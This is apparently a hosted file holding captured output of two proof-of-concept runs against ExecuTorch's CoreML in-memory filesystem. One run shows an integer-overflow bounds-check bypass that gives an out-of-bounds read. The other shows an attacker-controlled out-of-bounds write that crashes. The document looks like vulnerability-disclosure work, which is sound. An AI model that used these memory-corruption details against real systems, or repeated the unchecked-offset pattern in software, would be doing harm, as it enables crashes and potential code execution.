KEEBWZRD's picture
Upload 4 files
9c5b2f3 verified
Raw
History Blame Contribute Delete
1.19 kB
########################################################################
# ExecuTorch CoreML inmemoryfs — standalone PoC output (captured 2026-07-14T14:41:28Z)
# Host: Darwin arm64; compiler: Apple clang version 17.0.0 (clang-1700.6.3.2)
########################################################################
===== PoC 1: integer-overflow -> bounds-bypass -> OOB read =====
$ clang++ -std=c++17 -g -o p1 poc_range_overflow_oob_read.cpp && ./p1
[*] buffer size = 16
[*] attacker offset = 20
[*] attacker size = 18446744073709551596
[*] length()=offset+size = 0 (wrapped past SIZE_MAX)
[*] guard 'length() > size()': 0 > 16 -> PASS (bypassed!)
[!] slice() returned ptr 20 bytes past a 16-byte buffer; dereferencing:
[!] OOB read = 0x00 (should NOT reach here under ASan)
[exit: 0]
===== PoC 2: controlled-offset OOB write (crashes) =====
$ clang++ -std=c++17 -g -o p2 poc_oob_write.cpp && ./p2
[*] dst region capacity = 4096 bytes
[*] attacker offset = 0x200000 (2097152 bytes past the region)
[*] NO check that offset+size <= capacity; calling memcpy(dst+offset, src, 16)...
[exit: 139 — 139 = SIGSEGV, crash on the out-of-bounds write]